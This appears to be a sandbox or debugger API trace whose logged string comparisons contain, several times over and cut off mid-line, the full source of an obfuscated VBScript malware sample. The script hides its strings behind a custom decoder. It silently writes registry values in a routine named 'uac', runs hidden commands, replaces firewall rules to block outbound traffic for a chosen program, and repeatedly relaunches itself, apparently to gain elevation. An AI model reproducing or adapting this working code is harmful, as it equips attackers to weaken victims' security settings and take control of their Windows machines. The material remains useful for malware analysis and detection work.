bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.287] wcsncmp (_String1="y = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0226.287] wcsncmp (_String1=" = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.287] wcsncmp (_String1="= \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.287] wcsncmp (_String1=" \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), 